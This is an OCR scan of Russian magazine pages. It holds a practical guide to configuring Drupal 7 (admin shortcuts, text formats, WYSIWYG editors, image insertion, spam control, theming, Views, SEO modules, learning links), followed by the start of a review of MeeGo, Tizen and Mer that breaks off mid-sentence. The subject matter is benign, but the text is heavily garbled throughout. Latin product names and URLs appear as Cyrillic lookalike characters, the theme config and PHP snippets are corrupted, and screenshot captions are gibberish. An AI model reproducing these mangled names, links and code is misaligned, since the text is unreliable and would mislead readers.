и при желании их можно даже комбинировать 
(но это тема для отдельного обсуждения). 
Простота НотеЬгеѵѵ для пользователей и раз- 
работчиков дает проекту возможность очень 
активно развиваться, поэтому вполне воз- 
можно, что рано или поздно он займет пальму 
безусловного первенства. Но на сегодняшний 
день максимально функциональным решени- 
ем остается МасРогІз — даже несмотря на то, 
что его постепенно становится модно ругать. 
Да и наконец, выбор — это же всегда хорошо, 
верно? 
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НАСТРАИВАЕМ 
ОРЦРАЬ ДЛЯ СЕБЯ, 

ПОСЕТИТЕЛЕЙ САЙТА і 
И ПОД ПОИСКОВЫЕ 
МАШИНЫ V Т 



Обзоров ОгираІ более чем достаточно, но так или иначе они основаны на теории, то есть описании 
модулей: мол, система очень гибкая, вот тебе список модулей, дерзай! А на практике нюансов очень 
много. Важно понимать, что ОгираІ нужно настроить не только для себя, но и для пользователей 
и поисковых машин. Под этим углом мы и рассмотрим СМ5. 



Пять способов сделать ОгираІ удобней для себя 



Очевидно, что, если ты мигрируешь 
с ѴѴогсІРгезз, тебя покоробят многие стран- 
ности, которые должны работать из коробки, 
но в ОгираІ решаются изощренным способом. 
Перед тобой — советы из личной практики, 
манипуляции, которые приходится произво- 
дить с закрытыми глазами для каждого свеже- 
установленного сайта на ОгираІ. 

УДОБНАЯ АДМИНКА 

ОгираІ может похвастаться интерфей- 

сом бгад'п'сігор (см. Асітіпізігаііоп ^ 

ОазЬЬоагсІ), боюсь, что по неопытности это бу- 
дет похоже на СІазЬ'М 51азЬ. Главный совет — 
используй ТооІЬаг & ЗЬогкиІ (СопПдигаІіоп ^ 
Озег іпіегі'асе ^ ЗЬогкиІз) для быстрого до- 
ступа к нужным функциями настройки панели 
управления ОазЬЬоагсІ. Это реально ускоряет 
работу с ОгираІ: ты добавляешь нужные раз- 
делы в закладки на тулбар и не обращаешься 
всякий раз к оперативной памяти своего 
мозга. 

На мой взгляд, модуль Абтіпізігаііоп тепи 
[ із.асІ/гКхОи ] в виде выпадающего списка, 
который часто упоминается в списке тизЫпаѵе 
модулей, достаточно громоздкий и в седьмой 
версии ОгираІ не так уж и незаменим. 



Также, если тебе не нравится внешний вид 
админки, можешь сменить тему 5еѵеп на РиЫк 
( із.дсІ/іІХКК7 ) или РиЫк ( Із.дсі/Еіібдг ). 

ЧТО ВИЖУЛО И ПОЛУЧАЮ 

Обычно я обращаюсь к формату 

Ріаіпіехі (СопПдигаІіоп ^ Сопіепі 

аиіЬогіпд ^ Техі ^огтаіз) при наборе простого 
текста — когда использовать все возможные 
НТМІ-теги нет смысла и времени. 

Для других пользователей, которым предо- 
ставляется доступ к публикации контента 
на сайте, я всегда настраиваю РіКегесІ НТМІ, 
где указываю доступные теги, потому что не- 
умелое использование НТМІ может угрожать 
безопасности (например, кто-то захочет по- 
упражняться с сгозз-зііе зсгірііпд) или слегка 
«подправить» верстку :). 

Если ты испытываешь дискомфорт, уста- 
нови модуль ѴѴУ5ІѴѴУ0 Пз.дсІ/аппісОр ] и выбери 
текстовые форматы, в которых нужно исполь- 
зовать визуальный редактор (СопЛдигаІіоп ^ 
Сопіепі аиіЬогіпд ^ ѴѴузіѵѵуд ргоЯІез). 

Модуль ѴѴУ5ІѴѴУ0 позволяет добавить 
на сайт ѴѴУ5ІѴѴУ0 по твоему выбору. Наи- 
большей популярностью пользуются СКЕсІіІог 
и ТіпуМСЕ, но можно выбрать и более мини- 



малистичные: МісЕсІіІ и прочие. Я предпо- 
читаю ТіпуМСЕ, поскольку он испытывает 
меньше проблем при отображении в браузерах 
и вставке картинок средствами СМ5. По срав- 
нению с тем же СКЕсІіІог, который в сообществе 
ОгираІ упоминается значительно чаще. 

Совет дня. Все модули, о которых будет 
идти речь, ты можешь устанавливать с помо- 
щью консоли ОгизЬ: 

• із.дсІ/Ь4п]5сІ — инсталлятор для ѴѴіпбоѵѵз; 

• із.аб/сАК5ѴѴ2 — для ЦМІХ/05Х. 

Кстати, в восьмой версии ОгираІ продвину- 
тое редактирование будет включено в стан- 
дартный набор. Практически любой текст ноды 
(побе) можно будет редактировать на лету, 
не заходя во вкладку редактирования. Роль 
ѴѴУ5ІѴѴУ0 будет выполнять редактор АІоЬа 
Ебііог ( аІоЬа-ебіІог.огд ). Хорошо это или нет — 
покажет время. Сейчас доступна альфа-версия 
проекта под кодовым названием 5рагк ( бгираі. 
огд/рго]есі/зрагк ), можешь пощупать новую 
систему редактирования. 

Вдогонку советую документ «ѴѴУ5(із поі 
аІѵѵауз)ѴѴУ6(ЬиІ сап Ье)» ( із.дб/05МР] р) — по- 
жалуй, один из самых подробных мануалов 
по настройке ѴѴУ5ІѴѴУ6 для ОгираІ. 
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Настройки полей для вывода изображений в разделе Мападе Ріеісіз 



Карги И ка 
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Вставка изображений в ѴѴУ5ІѴѴУ6 



Безумный Алоха 



3 ВСТАВКА ИЗОБРАЖЕНИИ ИГРАЮЧИ 

С одной стороны, в ОгираІ 7, по срав- 

нению с шестой версией, вставлять 

в текст ноды изображения стало проще. Благо- 
даря модулю Ітаде и встроенной поддержке 
стилей ты можешь определять не только 
размеры изображения, но и стиль вывода 
для разных типов материалов, для полной вер- 
сии материала и тизера. С другой же стороны, 
сложно понять, как на практике применять 
этот инструментарий для выполнения совер- 
шенно простых задач. 

Сначала устанавливаем модули Іпзегі 
[ сІгираІ.ога/рго]есі/іп5егі ] — для вставки изо- 
бражений в поле ѴѴУ5ІѴѴУ0 с помощью кнопки, 
а также Ітаде Резіге РіІІег ( із.дсІ/РпЗеІѵ ) — 
для возможности изменять размер картинки 
в редакторе. 

Заходим в «Ітаде зіуіез» (СопЯдигаІіоп ^ 
Месііа ^ Ітаде зіуіез), создаем и настраиваем 
стили по вкусу. Тем самым ты определишь 
варианты отображения картинок в тексте. 

Затем идем в Абтіпізігаііоп ^ Зігисіиге ^ 
Сопіепі Турез ^ Мападе ЯеИз и добавляем 
поле «Рііе». В последующем окне настроек 



□ ЕпаЫе Опсфйоп ПМ 

ТЬе»е ор(іоп$ Шм (Ье и5«г (о е«$<у іп$«г( ап НТМЬ (ав$ іпіо (ех( аг> 
«еіуре. 

@ Епаые ш$«гі ЬіЛІоп 
ЕНАМ.ЕО ІН$ЕКТ $ТаЕ$ 

□5СІк(а1 

□ Ди(опа(к 

□ ипкЮПе 
0ОН|іпа1іта|е 

□ соѵег 
0(аг|е 
0 ткйипя 
0рд|е_ЬдСк 

0имяЬпа« 



В «АІІоѵѵесІ и\е ехіепзіопз» указываем до- 
пустимые форматы изображений для закачки. 
«МитЬег о1" ѵаіиез» — «СІпІітіІесІ». Обязатель- 
но отметь «ЕпаЫе іпзегі Ьииоп» и укажи стили, 
которые определил ранее в «Ітаде зіуіез». 

Теперь ты сможешь добавлять в ноды 
картинки и менять их размер (при наличии 
ѴѴУ5ІѴѴУ0). 

Если планируешь добавлять на сайт аудио 
и видео, советую модуль Месііа ( бгираі.огд/ 
рго]есі/тесІіа ] — добавление мультимедиа 
через РіеІсІ Ш поля. Если ты приверженец 
новейших веяний веба, МесІіаЕІетепІ ( із.дсі/ 
Ірзі93 ] — твой выбор. Это альтернативная 
НТМЕб-оболочка для проигрывания аудио 
и видео на сайте. Есть возможность сменить 
стандартную оболочку для проигрывателя 
УоиТиЬе, если она тебе не по душе. 



ВСЕВИДЯЩЕЕ ОКО 

На мой взгляд, «Рерогіз» — один 

из самых любопытных разделов 

в ОгираІ. Он знает все о поведении пользова- 
телей на сайте, расскажет об ошибках сайта — 
в общем, обо всей его жизни, которая проис- 
ходит без вашего участия. Но по умолчанию он 
работает не на полную силу. Зайди в раздел 
«Мобиіез» и проверь, модули Зіаіізіісз и Зузіод 
должны быть включены. 

Например, в разделе «Торѵізііогз» ты легко 
можешь вычислить бота, который зависал 
на твоем сайте (отнюдь не из любопытства), 
и забанить его по ІР в «ІР Абсігезз Ыоскіпд». 
Раздел «Ресепі Іод теззадез» рассказывает 



МАХШЦМ СОМРОМСНТ ІЕМОТН 
100 



ЦРОАТЕ АСТЮМ 

О Оо по(Ып(. Ье«ѵе (Ье <м «іі«5 тис(. 

О Сгм(с а пеѵѵ Ьеаѵ« (Ье ехізіілс Шіш% Ьяк(1оп1п|. 

^ Сгсаіе а псѵу аЬаі. Осіеіе (Ье ок) аЬа$. 

0 ТгапзШега(е ргіог (о сгеа(1п{ аЬах 



Включаем кнопку «Іпзегі» для вставки изображений 



Включаем транслитерацию адресов в РаНіаиІо 



о том, кто заходил на сайт, где обнаружены 
битые ссылки (статус 404), кто пытался за- 
йти в админку. Чтобы ты немного отдохнул 
от потока информации, предлагаю тебе топ-5 
запросов моих посетителей с авторскими 
комментариями: 

• «ОТДЫХ СЦУККОА» (не помешал бы); 

• «скачивать музыку с контакта» (не по адресу); 

• «арест» (проблемы не у тебя одного); 

• «удалить» (точно, единственное желание 
удалить мой сайт через скрытую командную 
строку в поиске); 

• «секреты хр» (расслабься, в 'хр' нет секретов). 

Также обрати внимание на раздел 
«Рерогіз ^ Зіаіиз герогі», который дает 
общую сводку о состоянии сайта. Грамот- 
ное изучение отчетов позволяет исправить 
ошибки на сайте и избежать последующих 
проблем. В принципе, есть боодіе ѴѴеЬтазІег 
Тооіз и прочие инструменты для мониторинга, 
но статистика ОгираІ во многих случаях рабо- 
тает более оперативно. 

ПЕРЕКРЫВАЕМ СПАМЕРАМ 
КИСЛОРОД 

У пользователей ѴѴогбРгезз есть 
мощный инструмент для отсева спама в ком- 
ментариях — АкізтеЕ Поэтому спамерам 
не остается ничего другого, как перенаправить 
силы на пользователей ОгираІ. Как только ты 
активируешь модуль комментариев (а в ОгираІ 
он включен изначально), готовься к атаке: это 
равносильно тому, что на Земле исчез озоно- 
вый слой :). 

На своих сайтах я ставлю модуль Оіздиз — 
спаминг в комментариях сразу прекращается. 
Зарегистрировав свой сайт на сііздиз.сот. ты 
можешь привязать к нему упомянутый АкізтеЕ 
Ктому же эта система делает комментиро- 
вание более удобным, комментарии проще 
модерировать, гибко управляя ѵѵЫіе- и Ыаск- 
списками. Ты можешь поставить этот модуль 
на все сайты, админка для комментариев будет 
общей. 

Завершающий штрих: не лишним будет 
отключить регистрацию новых пользователей 
в админке ОгираІ: СопПдигаІіоп ^ Реоріе ^ 
Ассоипі зеиіпдз. 
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РС20ЫЕ 



Пять способов улучшить юзабилити ОгираІ 



В составе ОгираІ 7 имеется три темы: Вагіік, 
Веѵеп и 5іагк. Допустим, ни одна из них тебе 
не пришлась по вкусу. Для ОгираІ 7 на минуту 
написания статьи доступны более 380 вари- 
антов, но с учетом субъективной фильтра- 
ции это очень маленькая цифра. Визуально 
привлекательные темы можно перечислить 
по пальцам. По запросу «ОгираІ іЬеітіез» ты 
скорее найдешь интересные коммерческие 
темы, но не бесплатные. 

ПЕРЕКРАИВАЕМ ГОТОВУЮ ТЕМУ 

Таким образом, в ОгираІ повысить юза- 

билити можно, написав собственную 

тему. Самый сподручный способ — модифици- 
ровать тему Вагіік, она гораздо гибче багіапсі, 
которая является «официальным лицом» 

ОгираІ 6. Это вполне универсальный шаблон, 
с которого можно начать свой путь в кодинге. 

Кроме Віагк, доступно много базовых тем 
для дальнейшей кастомизации: 2еп, Вазіс, 
Отеда и другие. Например, 960РоЬо1з основан 
на 960 дгісі, Тѵѵіиег Вооізігар ( бгираі.огд/ 

) — на одноименном 
фреймворке. Вариантов множество, выбирай 
любой в разделе «ТЬетез» официального 
сайта ОгираІ. 

«НЕІІОѴѴОРІВ» — 

ПИШЕМ ТЕМУ С НУЛЯ 

На самом деле написать свою тему 
нетрудно, для этого не нужно быть гуру РНР- 
кодинга. Стандартная файловая структура 
темы может выглядеть так: 




С55\ 


папка с С55. картинками 


и ПРОЧИМ контентом 


С55\з1:у1е.с55 


С55-файл темы 


оаееЛо! 


оболочка главной 


страницы 


побе.1;р1 


оболочка ноды 


5сгееп5Ііо1;.рп§ 
туііііете. іп-Ро 


скриншот формата 150x90 
конфиг темы 



Рассмотрим файл конфига туіЬете.іпІ'о. 

Конфигурация темы туѣііете . іп-Ро 

; должно совпадать с названием файла 

; конфига 

пате = туііііете 
; описание темы 

сіезсгіріііоп = Неііо Іліогісі 

раскате = Соге 

: версия Ргираі 



ѵегзіоп = VЕК5IОN 

соге = 7.x 

: Зііуіезііееііз - файлы стилей темы 

5І:у1е5Ііее1:5[5сгееп] [ ] = сзз/зііуіе.сзз 

: $сгір1і5 (скриптьО - 35-скрипты 

5сгір1і5[] = із/тѵ.із 

; Ке^іопз - указываем регион ы 

; для размещения блоков 

ге^іопз[соп1:еп1:] = Соп1:еп1: 

ге§іоп5[те55а§ез] = Мезза^ез 
ге§іопз[ра§е_1;ор] = Ра§е 1;ор 
ге§іопз[ра§е_Ьо1;1:от] = Ра§е Ьо1;1:от 
ге§іопз[5ІсІеЬаг_бг5І;] = Рігзі; зісІеЬаг 

Регионы ты можешь указать в конфиге по- 
сле того, как будет сверстана НТМІ-страница. 
Вначале делаешь статичный макет страницы, 
сохраняешь в НТМІ со всей структурой, за- 
брасываешь в папку с твоей темой, переиме- 
новываешь іпбех.ЫтІ в раде.ІрІ.рЬр и запол- 
няешь переменными. Список переменных и их 
описание смотри внутри файла раде.ІрІ.рЬр, 
в побе.рЬр.ІрІ. 

Пример переменных^ используемых 
в раде.-ЬрІ.рИр 

/* выводим стили, указанные в секции 
Бііѵіезііееііз конфига тѵііііете. іп-Ро */ 

<?ріір ргіп1: $5І:у1е 5: ?> 

/* выводим скрипты, указанные в секции 

$сгір1і5 конфига тѵііііете. іп-Ро */ 

<?ріірргіп1: $5сгір1і5: ?> 

/* выводим регион Соп1:еп1:. указанный 

в секции Ке^іопз */ 

<?рІ ір ргіпі: гепсіег($ра^е[ ' соп1іеп1: ' ] V. ?> 



В конце статьи я привел ссылки на по- 
лезные ресурсы, где ты найдешь множество 
видеогайдов, которые с головой погрузят 
тебя не только в темизацию, но и в АсІѵапсесІ 
ТЬетіпд. 

Если ты разрабатываешь тему на НТМ15, 
советую установить тулкит НТМ15 Тооіз 
( ) — набор ин- 

струментов для поддержки новых стандартов, 
который, в частности, включает Мосіегпігг — 
библиотеку для совместимости со старыми 
версиями браузеров. 



ѴІЕѴѴ5 

Даже написав свою тему, ты сделаешь 
полдела. Представь, что тебе нужно 
вывести на главной странице колонку с наибо- 
лее посещаемыми страницами, отфильтровать 
ноды, вывести таблицу с данными или галерею 



с изображениями. Штатный функционал 
ОгираІ не позволяет выполнять такие задачи 
красивыми методами. Можно делать сотни 
запросов к базе данных через тему оформле- 
ния, но для подобных задач это совершенно 
неразумно (к тому же все будет привязано 
к одной теме). 

Здесь на помощь приходит Ѵіеѵѵз. Ѵіеѵѵз 
( сІгираІ.огд/рго]ес^/ѵіеѵѵз ] — один из самых 
известных и функциональных модулей, 
который, по всей видимости, войдет в ядро 
ОгираІ. Если коротко, модуль позволяет на- 
страивать варианты отображения блоков, 
страниц, вложений, создавать фильтры, 
условия. В связке с ССК раскрывает нескром- 
ные возможности ОгираІ. 

Совершим небольшой экскурс в недра 
Ѵіеѵѵз. Открой раздел ВігисШге ^ Ѵіеѵѵз в ад- 
минке, включи Ѵіеѵѵ под названием «Рориіаг 
сопіепі» и перейди в настройки (Ебіі Ѵіеѵѵ). 

Помимо прочей интересной информа- 
ции, ты видишь «5ог1 Сгііегіа» с критерием 
сортировки «Сопіепі зіаіізіісз»: «Тоіаі ѵіеѵѵз 
(безе)». Выше находятся поля — Ріеібз. Поля 
ты можешь создавать в ССК и таким образом 
выдавать интересующую тебя информацию 
в виде таблицы, сетки, списка. Формат вывода 
можно расширить с помощью модулей, на- 
пример календарь (модуль Саіепбаг), слайдер 
изображений (МіѵоБІібег) и так далее. 

Если перед тобой стоит задача вывода 
контента на сайте, старайся решать ее через 
Ѵіеѵѵз. Опытные друпалеры всегда советуют 
вместо установки специфического модуля 
действовать через «вьюсы». 

РАМЕ15 

Если модуль Ѵіеѵѵз кажется тебе 
слишком тяжелым (для сайта или тво- 
его понимания), попробуй Рапеіз ( бгираі.огд/ 
рго]есі/рапеІз ) — еще один модуль от раз- 
работчика Ѵіеѵѵз. Позволяет расположить 
на странице панели с фрагментами инфор- 
мации без знаний С55 или НТМЕ методом 
бгад'п'бгор. Информация может выводиться 
на основе Сопіехіз, все это описано в докумен- 
тации. 




ОІЗРІАУЗиіТЕ 

Оізріау 5иі1е ( бгираІ.огд/рго]есі/бз ) 
также использует при построении ди- 
бгад'п'бгор. Преимущество Оізріау Виііе 
в том, что этот модуль предлагает предуста- 
новки с готовыми вариантами отображения, 
что делает его еще более изег І^гіепбіу. 



зайна 



ЕСЛИ СТОИТ ЗАДАЧА ВЫВОДА КОНТЕНТА, РЕШАЙ ЕЕ ЧЕРЕЗ 
ѴІЕ>Ѵ5. ОПЫТНЫЕ ДРУПАЛЕРЫ СОВЕТУЮТ ВМЕСТО УСТАНОВКИ 
СПЕЦИФИЧЕСКОГО МОДУЛЯ ДЕЙСТВОВАТЬ ЧЕРЕЗ ^<ВЬЮСЫ>^ 
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Недетский ОгираІ 



Пять способов поднять ОгираІ в глазах поисковых систем 



Объективно говоря, изначально ОгираІ абсо- 
лютно не предназначен для 5Е0-оптимизации. 
Речь идет не о каких-то специфических на- 
стройках, а о базовых понятиях. 

Ты можешь установить широко извест- 
ный модуль 5Е0 СЬескІізІ ( сІгираІ.огд/рго]есі/ 
зео сЬескІізО , написанный Беном Финкли 
(Веп Ріпкіеа), который является автором книги 
«ОгираІ 6 БеагсЬ Епдіпе Орііппігаііоп». Этот 
чек-лист поможет тебе провести пошаговую 
5Е0-оптимизацию сайта на ОгираІ. Он не со- 
держит опций, как-то влияющих на работу 
ОгираІ, но в одной оболочке собрал все не- 
обходимые модули, которые ты должен будешь 
самостоятельно установить и настроить. 

Есть неплохой платный видеокурс, который 
можно приобрести на сайте сігираііге.ппе . В нем 
демонстрируется прохождение чеклиста плюс 
затрагиваются некоторые вопросы оптимизации. 
Давай посмотрим, что может предложить 5Е0 
СЬескІізІ (насколько позволяет формат статьи). 

МЕТАТЕГИ 

Открой исходный код своего сайта: 
ты не найдешь строк, относящихся 
к метатегам. Это, конечно, удручает, хотя роль 
у тегов уже не та, что в прежние годы, когда, 
грубо говоря, с помощью двух кейвордов ты 
манипулировал выдачей. 

Модуль Меіаіадз добавляет возможность 
редактировать метатеги как в отдельных 
материалах, таксономии, так и на главной 
странице. Доступны токены, так что можно 
задавать маски для автоматического опреде- 
ления тегов. Однако этим удобством советую 
не злоупотреблять. 




ДЕЛАЕМ АВТОУРЛЫ 

Штатный модуль ОгираІ — РаШ позво- 
ляет задавать альтернативный адрес 
для любой страницы, делать путь удобочита- 
емым. Но зачем вручную заниматься тем, что 
сам доктор прописал автоматизировать? Такой 
модуль есть. РаіЬаиІо ( із.дсІ/Ь5Ь02к ) генери- 
рует адреса на основе шаблонов (токенов) 
для любых материалов. 

Изначально ОгираІ создает кирилли- 
ческие адреса, нужно установить модуль 
Тгапзіііегаііоп (із^йММІЖі) и включить 
опцию «Тгапзіііегаіе ргіогіо сгеаііпд аііаз» 
в настройках РаіЬаиІо. 

Пользуйся модулем аккуратно: если у тебя 
сайт-многостраничник и ты поменяешь все 
урлы через Виік ирсіаіе, это чревато послед- 
ствиями (лично мне пришлось менять вручную 
около 250 ссылок на изначальные адреса). 

КАРТЫ В РУКИ 

ХМЕ зііетар — модуль для создания ХМЕ- 
карты сайта, которая помогает поиско- 
вым системам точнее индексировать контент. 

Не забудь активировать типы материалов, 
которые требуется индексировать (Іпсіизіоп — 
ІпсІибесІ) и указать приоритет обновлений 
страниц. Карта будет полностью сгенерирова- 
на после одного или нескольких проходов Сгоп 
(СопЯдигаІіоп ^ Бузіеіті ^ Сгоп). Подробнее 
о формате Бііетар читай тут: ѵѵѵѵѵѵ.зііеппарз. 
огд/рго1осоІ.ЬіппІ . 

АНАЛИТИКА ОТ 60061Е 

Здесь есть два варианта. Первый — 
добавить скрипт сервиса в код твоего 





сайта и заходить на сервис по привычному 
адресу ѵѵѵѵѵѵ.доодіе.сот/апаіуіісз/ (удобно, 
если у тебя несколько сайтов). Можно код до- 
бавить вручную, через «Блоки», или устано- 
вить простенький модуль Соодіе Апаіуіісз (і«^ 
дс1/1С10Ье ) и указать уникальный код, присво- 
енный при регистрации на сервисе. 

Второй вариант более изощренный, 
для его реализации нужно установить модуль 
Соодіе Апаіуіісз Рерогіз. Он позволяет оце- 
нить все прелести Ооодіе СЬагІ АРІ, настроив 
графики из Апаіуіісз. Об этом читай инструк- 
цию в трех частях: І5.дсІ/р2ТЕЬе . Данный метод 
мне нравится больше, поскольку я избавляю 
себя от необходимости лишний раз заходить 
в панель Апаіуіісз, когда интересуют только 
2-3 графика из всей статистики. 

СОЦИАЛИЗИРУЕМСЯ 

Напоследок не могу не упомянуть 
о социальных модулях для ОгираІ. 
После длительного тестинга я смог найти 
только два неплохих варианта. На самом 
деле список модулей мог состоять из доброй 
дюжины модулей, но я ограничился толь- 
ко теми, которые действительно полезны 
при минимальном загромождении ЗаѵаБсгірІ- 
кодом. 

• БЬаге Вииопз (АбсІТоАпу) Ьу Еоскегг 
( сІгираІ.огд/рго]есі/асІсІ^оапѵ ) — поддержка 
АбсІТоАпу виджета для зЬаге-публикаций 
в социальных сетях. 

• Тѵѵіиег ( I ± ) — инте- 

грация сайта с Тѵѵіиег. Позволяет делать 
репост в Тѵѵіиег, выводить твиты на сайте 
в виде блока через Ѵіеѵѵз. 





Тема оформления РиЬік 



АОООМ. 10 СПОСОБОВ ПРОКАЧАТЬ НАВЫКИ ПО ОРУРАЕ 



• СоттипЦу Ооситеп(а(іоп ( сігираі.огд/сіоситеп^а^іоп ) — неисчерпаемый, пусть и 
порядком хаотичный, источник знаний для любого друпаллера. 

• ОгираІ. ги — ресурс, где ты можешь задать любые вопросы, касающиеся ОгираІ. 

• ОгираІ РІапеІ ( сІгираІ.огд/рІапеО — сообщество ОгираІ, где нередко встречаются отличные 
уроки и скринкасты. 

• Воокз аЬои( ОгираІ ( сІгираІ.огд/Ьоокз ) — большая подборка книг со ссылками на превью. 
Поскольку ОгираІ можно использовать для различных целей (например, создание 
магазина или СРМ, написание модулей и так далее), выбор литературы — за тобой. 

• ІиІІаЬоІ РосІсазІ ( ) — один из моих 

любимых образовательных ресурсов по качеству материала и подходу к обучению. 

• Огираііге Ме ( сігираііге.те ) — исчерпывающие видеокурсы по ОгираІ от команды ЕиІІаЬоІ. 
Часть эпизодов доступна бесплатно. 

• ОгираІ Ѵісіео Росісазі (гг ^ тіесІіа.сот/росісазП — множество бесплатных 

подкастов разных уровней сложности и всевозможные темы. 

• ХапсІеасІх.ги — на мой взгляд, самый интересный в Рунете блог, посвященный ОгираІ. 
Часто обновляется, содержит подборку не самых банальных задач и их решения. 

• Іеагпіпд ІіЬгагу ( посіеопе.зе/зѵ/Іеагпіпд-ІіЬгагу ) — библиотека тематических видео, много 
актуальных скринкастов для последней версии ОгираІ. 

• ОгираІ ТѴ ( сігираі-^ѵ.ги ) — отличная подборка видео как на русском, так и на других 
языках. 
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Евгений Зобнин (апсігоісізігееі.ги) 










ДЕТАД|>НЫИ 

ОБЗОР 



МЕЕСО 

ТІ2ЕМ 

>ѴЕВ08 

ПКЕРО 



Версии библиотеки л ^ 
*Епуо доступны ’ і 

нетолько вѵѵеЬОЗ, > і 
но и для операци- 
онных систем І05, 
Апсігоігі, ВІаскВеггу, 
ѴѴіп(Іоѵѵ5, атакже 
всех популярных 
браузеров. 

* Еще до заключения 
договора о раз- 
работке совместной 
ОС Іпіеі и МееСо вы- 
пустили свободный 
стек для создания 
связанных с теле- 
фонией прііложений, 
оРопо, который 
позже был интегри- 
рован в МееСо, Ті^еп 
и Мег. 



Услышав фразу «мобильная операционная система», большин- 
ство людей вспоминают об АпбгоісІ, І05, ѴѴіпсІоѵѵз РИопе, а не- 
которые даже пускают скупую слезу по ЗутЬіап. Тем не менее, 
кроме этой «большой тройки», в мире существует множество 
других, гораздо менее известных и разрекламированных мо- 
бильных ОС. Некоторые из них заслуживают особого внимания. 



осле бума Арр 5іоге и боодіе РІау стало 
очевидно, что успешность мобильной 
ОС определяется не только и не столько 
ее интерфейсом и функциональностью, сколько 
развитостью экосистемы вокруг нее. Сколько 
приложений доступно для этой платформы? 
Доступны ли знаменитые игры, реализова- 
на ли поддержка популярных веб-сервисов? 

И оказалось, что любой новый игрок на рынке 
сталкивается с замкнутым кругом. Разработчики 
не будут писать программы для непопулярной 
платформы, а без них новая ОС не сможет до- 
стучаться для пользователей. 

Все ОС в данном обзоре решают эту 
проблему схожим образом — делая ставку 
на веб-технологии. Все описанные платформы 
пытаются найти способ связать между собой 
веб-приложения с железом реального смартфо- 
на или планшета и друг с другом. 

Почему именно веб-технологии? Идея до- 
вольно проста: чтобы сделать клиент вашей 
социальной сети или другого сервиса для нашей 
ОС, вы сможете воспользоваться технологиями, 
на которых уже работает ваш продукт, включая 
разнообразные расширения к НТМ15, С553, 5Ѵ6 
и ЗаѵаВсгірС Кроме того, делается ставка на то, 
что новым разработчикам будет проще работать 



с этими технологиями, чем учить специфическую 
разновидность Заѵа или совсем экзотичный 
язык вроде ОЬ]'есІіѵе-С. 

Сразу стоит заметить, что по этому пути идут 
не только новички, но и достаточно известные 
ОС, потерявшие популярность в результате 
революции приложений. На НТМ15 делает 
ставку ѴѴіпсІоѵѵз 8 (планшетная версия) 
и ВІаскВеггу 05 1 0 — поэтому операционных 
систем с развитыми платформами для нативных 
приложений остается совсем мало. 

Но выигрывают пока именно они. Почему так 
происходит? 



МЕЕОО/МЕР 



Начать обзор я хотел бы с МееОо — возможно, 
последней попытки сделать традиционную 
мобильную ОС. Именно ее судьба и стала уроком 
для всех остальных персонажей этой истории. 
Операционная система с хорошей технической 
базой и поддержкой крупных компаний оказа- 
лась бессильна перед натиском І05 и АпбгоісІ 
именно из-за отсутствия понятной экосистемы 
для разработчиков и пользователей. 

МееОо обязана своим существованием 
инженерам Іпіеі и Мокіа, которые работали над 
созданием независимых мобильных ОС (МоЫіп 



и Маето), основанных на технологиях Ыпих, 
а в начале 2010 года решили совместно создать 
единую ОС. Результатом стала выпущенная 
всего через несколько месяцев операционная 
система МееОо 1 .0 Агііпдіоп, поддерживаю- 
щая около двух десятков уже присутствующих 
на рынке нетбуков и частично коммуникатор 
Мокіа N900, который к тому времени уже обрел 
большую популярность среди продвинутых 
пользователей. 

МееОо интересна в первую очередь своим 
набором инженерных решений, большин-ство 
из которых основаны на традициях СІМІХ и Ііпих. 
Во-первых, МееОо — это не совсем само- 
стоятельная ОС, а скорее Ііпих-дистрибутив, 
адаптированный для работы на разного рода 
портативных устройствах и встраиваемой 
технике, начиная от нетбуков и мультимедийных 
систем автомобилей и заканчивая смартфона- 
ми и умными телевизорами. Практически все 
компоненты этой операционной системы были 
позаимствованы из настольных ОС, основанных 
на ядре Ііпих. Здесь используется все тот же 
набор низкоуровневых библиотек, мультимедиа- 
фреймворк бзігеатег, аудиосервер РиІзеАисІіо, 
Х-сервер, библиотека ОТ как основной инстру- 
мент создания графических приложений и даже 
набор стандартного Ііпих-ПО, например почто- 
вый клиент Еѵоіиііоп и браузер СЬготіипп. Все 
это делает работу с МееОо привычной для мно- 
гих пользователей, а заодно как бы автоматиче- 
ски снабжает ее набором качественного ПО, что 
очень важно для молодой ОС. 

Во-вторых, и это еще более важно, раз- 
работчики изначально спозиционировали 
операционную систему как некий набор базовых 
компонентов, поверх которых можно создавать 
совершенно разные интерфейсы для различ- 
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ных устройств и рынков, сохраняя при этом их 
полную совместимость между собой. Операци- 
онная система имеет стандартизированный АРІ, 
большей частью основанный на фреймворке ОТ, 
который гарантирует совместимость вариантов 
ОС между собой, но дает полную свободу из- 
менения графического интерфейса (ситуация, 
схожая с многообразием ОЕ для Ыпих). При этом 
важно, что разработкой основного набора 
графических оболочек также занимались про- 
граммисты МееСо — таким образом обеспечива- 
лась общая целостность интерфейсов. За время 
существования Меебо под крылом Іпіеі и Мокіа 
было разработано целых четыре варианта 
интерфейса (называемых в терминологии Меебо 
их — Узег Ехрегіепсез): для нетбуков, смартфо- 
нов, планшетов и автомобильных компьютеров. 

Совместно с Мокіа Іпіеі успела выпустить 
версии 1.1 и 1.2 платформы МееСо, однако по- 
сле заключения соглашения с МісгозоИ Мокіа 



потеряла интерес к работе над этой операцион- 
ной системой, и разработка МееСо фактически 
завершилась в пользу проекта ТІ 2 еп. Последняя 
унаследовала большинство наработок МееСо, 
но фактически стала совершенно новой ОС, 
а место Мокіа в ее разработке заняла преимуще- 
ственно Заппзипд вместе с несколькими другими 
компаниями, включая МЕС и Рапазопіс. 

Казалось бы, на этом судьба МееОо должна 
была завершиться, однако, как это часто 
бывает с открытыми проектами, в конце 201 1 
года обязанность за развитие проекта тут же 
взяли на себя независимые разработчики. Был 
создан проект Мег, в рамках которого началось 
дальнейшее развитие идей МееСо в тесном 
сотрудничестве с ТІ 2 еп. Следуя принципам раз- 
вития полностью открытых проектов, он вклю- 
чал открытую экосистему и модель управления, 
основанную на меритократии (руководят те, кто 
внес больший вклад в развитие проекта). 



Разработчики Мег еще больше сместили 
акцент развития операционной системы к раз- 
работке базовых компонентов системы и предо- 
ставлению производителям устройств лишь 
фреймворка, с помощью которого последние 
смогут создавать собственные ОС, — при этом 
можно подключать разработки своих или других 
проектов. Так, Мег позволяет использовать 
в качестве графического интерфейса оболочку, 
разработанную в рамках проекта ТІ 2 еп, а также 
любые другие графические среды, включая 
РІазта Асііѵе от сообщества КОЕ (эксперимен- 
тальный свободный планшет ѴіѵаИі, в котором 
используется этот интерфейс, работает под 
управлением дистрибутива Мег). 

Мег уже портировали на такие устройства, 
как РазрЬеггу Рі, ВеадІеВоагсІ, Мокіа N900, Мокіа 
N950, Мокіа N9 и несколько планшетов, осно- 
